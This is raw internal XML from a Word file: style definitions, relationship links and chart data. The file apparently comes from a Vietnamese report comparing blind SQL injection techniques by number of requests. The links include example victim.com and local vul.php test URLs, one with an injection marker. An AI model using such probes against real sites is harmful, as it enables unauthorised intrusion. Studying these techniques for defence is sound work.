    <w:rsid w:val="009733F8"/>
    <w:rsid w:val="00973F77"/>
    <w:rsid w:val="00974C72"/>
    <w:rsid w:val="00986F22"/>
    <w:rsid w:val="009A0CAF"/>
    <w:rsid w:val="009A5006"/>
    <w:rsid w:val="009A7430"/>
    <w:rsid w:val="009B4478"/>
    <w:rsid w:val="009B48A0"/>
    <w:rsid w:val="009B4DE2"/>
    <w:rsid w:val="009C08A2"/>
    <w:rsid w:val="009C3FFE"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rsid w:val="009D7A01"/>
    <w:rsid w:val="009F090B"/>
    <w:rsid w:val="009F49FE"/>
    <w:rsid w:val="009F6601"/>
    <w:rsid w:val="009F6DCD"/>
    <w:rsid w:val="00A041A4"/>
    <w:rsid w:val="00A13901"/>
    <w:rsid w:val="00A25AB0"/>
    <w:rsid w:val="00A30F88"/>
    <w:rsid w:val="00A31F57"/>
    <w:rsid w:val="00A3488B"/>
    <w:rsid w:val="00A42212"/>
    <w:rsid w:val="00A47856"/>
    <w:rsid w:val="00A5726C"/>
    <w:rsid w:val="00A642F1"/>
    <w:rsid w:val="00A65033"/>
    <w:rsid w:val="00A65A26"/>
    <w:rsid w:val="00A675EA"/>
    <w:rsid w:val="00A6793E"/>
    <w:rsid w:val="00A706C3"/>
    <w:rsid w:val="00A74FA1"/>
    <w:rsid w:val="00A82306"/>
    <w:rsid w:val="00A909F8"/>
    <w:rsid w:val="00A970BE"/>
    <w:rsid w:val="00AB5C7E"/>
    <w:rsid w:val="00AC0899"/>
    <w:rsid w:val="00AC7401"/>
    <w:rsid w:val="00AD2AED"/>
    <w:rsid w:val="00AE61AE"/>
    <w:rsid w:val="00AF144B"/>
    <w:rsid w:val="00AF34FB"/>
    <w:rsid w:val="00AF6183"/>
    <w:rsid w:val="00B00A0E"/>
    <w:rsid w:val="00B00EED"/>
    <w:rsid w:val="00B02A8B"/>
    <w:rsid w:val="00B03EBA"/>
    <w:rsid w:val="00B05040"/>
    <w:rsid w:val="00B10C08"/>
    <w:rsid w:val="00B1103E"/>
    <w:rsid w:val="00B1521D"/>
    <w:rsid w:val="00B3259C"/>
    <w:rsid w:val="00B3299C"/>
    <w:rsid w:val="00B32ABA"/>
    <w:rsid w:val="00B33ABE"/>
    <w:rsid w:val="00B4125E"/>
    <w:rsid w:val="00B425FC"/>
    <w:rsid w:val="00B479CD"/>
    <w:rsid w:val="00B5658E"/>
    <w:rsid w:val="00B649B0"/>
    <w:rsid w:val="00B70950"/>
    <w:rsid w:val="00B73288"/>
    <w:rsid w:val="00B748EF"/>
    <w:rsid w:val="00B93CAD"/>
    <w:rsid w:val="00B97F3E"/>
    <w:rsid w:val="00BA000F"/>
    <w:rsid w:val="00BA05F2"/>
    <w:rsid w:val="00BA2AA9"/>
    <w:rsid w:val="00BA74A3"/>
    <w:rsid w:val="00BB2579"/>
    <w:rsid w:val="00BB59F4"/>
    <w:rsid w:val="00BB7938"/>
    <w:rsid w:val="00BE2A5E"/>
    <w:rsid w:val="00BE5176"/>
    <w:rsid w:val="00BF48D5"/>
    <w:rsid w:val="00BF58E1"/>
    <w:rsid w:val="00BF78DE"/>
    <w:rsid w:val="00C04765"/>
    <w:rsid w:val="00C10140"/>
    <w:rsid w:val="00C16B7F"/>
    <w:rsid w:val="00C208E1"/>
    <w:rsid w:val="00C2633E"/>
    <w:rsid w:val="00C3317E"/>
    <w:rsid w:val="00C332BA"/>
    <w:rsid w:val="00C40E72"/>
    <w:rsid w:val="00C43364"/>
    <w:rsid w:val="00C60B75"/>
    <w:rsid w:val="00C6218F"/>
    <w:rsid w:val="00C94B63"/>
    <w:rsid w:val="00CA2D9F"/>
    <w:rsid w:val="00CA4181"/>
    <w:rsid w:val="00CB01FC"/>
    <w:rsid w:val="00CB36A9"/>
    <w:rsid w:val="00CB53C6"/>
    <w:rsid w:val="00CC2399"/>
    <w:rsid w:val="00CC2642"/>
    <w:rsid w:val="00CC78E5"/>
    <w:rsid w:val="00CD0DD2"/>
    <w:rsid w:val="00CD230E"/>
    <w:rsid w:val="00CD259A"/>
    <w:rsid w:val="00CD584F"/>
    <w:rsid w:val="00CE3969"/>
    <w:rsid w:val="00CF6A85"/>
    <w:rsid w:val="00D03A35"/>
    <w:rsid w:val="00D04636"/>
    <w:rsid w:val="00D10288"/>
    <w:rsid w:val="00D14C13"/>
    <w:rsid w:val="00D16775"/>
    <w:rsid w:val="00D21755"/>
    <w:rsid w:val="00D2208A"/>
    <w:rsid w:val="00D33E86"/>
    <w:rsid w:val="00D537D9"/>
    <w:rsid w:val="00D55C73"/>
    <w:rsid w:val="00D655B3"/>
    <w:rsid w:val="00D7567B"/>
    <w:rsid w:val="00D865CB"/>
    <w:rsid w:val="00D916C0"/>
    <w:rsid w:val="00D934A1"/>
    <w:rsid w:val="00DA0438"/>
    <w:rsid w:val="00DB3DB2"/>
    <w:rsid w:val="00DB4D2D"/>
    <w:rsid w:val="00DB7B2D"/>
    <w:rsid w:val="00DC4A3A"/>
    <w:rsid w:val="00DC7CF9"/>
    <w:rsid w:val="00DD2BF4"/>
    <w:rsid w:val="00DD5535"/>
    <w:rsid w:val="00DD5B0D"/>
    <w:rsid w:val="00DD5CC1"/>
    <w:rsid w:val="00DE462E"/>
    <w:rsid w:val="00DE7D2F"/>
    <w:rsid w:val="00DF6A89"/>
    <w:rsid w:val="00E22E58"/>
    <w:rsid w:val="00E2762E"/>
    <w:rsid w:val="00E43594"/>
    <w:rsid w:val="00E46E7F"/>
    <w:rsid w:val="00E54D96"/>
    <w:rsid w:val="00E56B71"/>
    <w:rsid w:val="00E64461"/>
    <w:rsid w:val="00E644EE"/>
    <w:rsid w:val="00E665FA"/>
    <w:rsid w:val="00E66620"/>
    <w:rsid w:val="00E72392"/>
    <w:rsid w:val="00E7327E"/>
    <w:rsid w:val="00E7608A"/>
    <w:rsid w:val="00E921F1"/>
    <w:rsid w:val="00E93309"/>
    <w:rsid w:val="00E955AF"/>
    <w:rsid w:val="00EA37D2"/>
    <w:rsid w:val="00EB02CD"/>
    <w:rsid w:val="00EB0F6B"/>
    <w:rsid w:val="00EB1EB3"/>
    <w:rsid w:val="00EE08FC"/>
    <w:rsid w:val="00EE2381"/>
    <w:rsid w:val="00EE4B21"/>
    <w:rsid w:val="00EE5E6C"/>
    <w:rsid w:val="00EF433B"/>
    <w:rsid w:val="00F022BA"/>
    <w:rsid w:val="00F227C7"/>
    <w:rsid w:val="00F37E33"/>
    <w:rsid w:val="00F441F2"/>
    <w:rsid w:val="00F45E2E"/>
    <w:rsid w:val="00F5471C"/>
    <w:rsid w:val="00F54753"/>
    <w:rsid w:val="00F67265"/>
    <w:rsid w:val="00F679BF"/>
    <w:rsid w:val="00F71BCB"/>
    <w:rsid w:val="00F7715B"/>
    <w:rsid w:val="00F84439"/>
    <w:rsid w:val="00F855C6"/>
    <w:rsid w:val="00F92F00"/>
    <w:rsid w:val="00F96CE5"/>
    <w:rsid w:val="00F97590"/>
    <w:rsid w:val="00FB590B"/>
    <w:rsid w:val="00FB61E3"/>
    <w:rsid w:val="00FC785D"/>
    <w:rsid w:val="00FE3533"/>
    <w:rsid w:val="00FE627D"/>
    <w:rsid w:val="00FF02A4"/>
    <w:rsid w:val="00FF35AF"/>
    <w:rsid w:val="00FF76BB"/>
    <w:rsid w:val="00FF7B8A"/>
    <w:rsid w:val="00FF7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1B3E9"/>
  <w15:docId w15:val="{C0BC1275-EC49-4927-996D-8CC23D81B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Calibri"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:line="252"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0702"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="312" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00817DAA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E64461"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00817DAA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:ind w:firstLine="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>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DAA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E64461"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00817DAA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InternetLink">
    <w:name w:val="Internet Link"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA077C"/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B43D5A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel2">
    <w:name w:val="ListLabel 2"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel3">
    <w:name w:val="ListLabel 3"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel4">
    <w:name w:val="ListLabel 4"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel5">
    <w:name w:val="ListLabel 5"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel6">
    <w:name w:val="ListLabel 6"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel7">
    <w:name w:val="ListLabel 7"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="TextBody"/>
    <w:rsid w:val="009C7A9D"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="FreeSans"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TextBody">
    <w:name w:val="Text Body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="288" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="TextBody"/>
    <w:rsid w:val="009C7A9D"/>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00AE568F"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Caption"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B43D5A"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i w:val="0"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B43D5A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B43D5A"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002C321E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007C72B3"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableContents">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009C7A9D"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00F02C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916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6C0"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00673C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3CE2"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00586AE9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00410F30"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="0"/>
      <w:spacing w:before="48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qFormat/>
    <w:rsid w:val="0008594E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00004A70"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1540"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0008594E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003308DA"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeInBox">
    <w:name w:val="CodeInBox"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeInBoxChar"/>
    <w:qFormat/>
    <w:rsid w:val="00876FFE"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00325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color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeInBoxChar">
    <w:name w:val="CodeInBox Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CodeInBox"/>
    <w:rsid w:val="00876FFE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00325E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032167">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="561908772">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="866452320">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1037437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ctim.com/products.php?val=100" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ftc.gov/os/caselist/0523148/0523148complaint.pdf"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192.168.1.59/vul.php" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kendyhikaru/WETK/tree/master/WETK0.2" TargetMode="External"/><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ecurityfocus.com/news/346" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.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yperlink" Target="http://cwe.mitre.org/top25/index.html"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hyperlink" Target="http://news.cnet.com/8301-10784_3-9758843-7.html"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192.168.1.59/vul.php?point=1%20*" TargetMode="External"/><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victim.com/products.php?val=100" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/cms/login.php?username=foo&amp;password=ba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chart" Target="charts/chart1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.phrack.com/issues.html?issue=54&amp;id=8" TargetMode="Externa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securityfocus.com/news/619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dài chuỗi</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$5</c:f>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-E9CD-42E1-BE12-D7595EBF7315}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Sheet1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Số yêu cầu</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$5</c:f>
              <c:strCache>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>Truyền thống</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Tìm kiếm nhị phân</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Dịch bit</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Phân tích thứ tự trả về</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$C$2:$C$5</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="4"/>
                <c:pt idx="0">
                  <c:v>62</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>7</c:v>
                </c:pt>
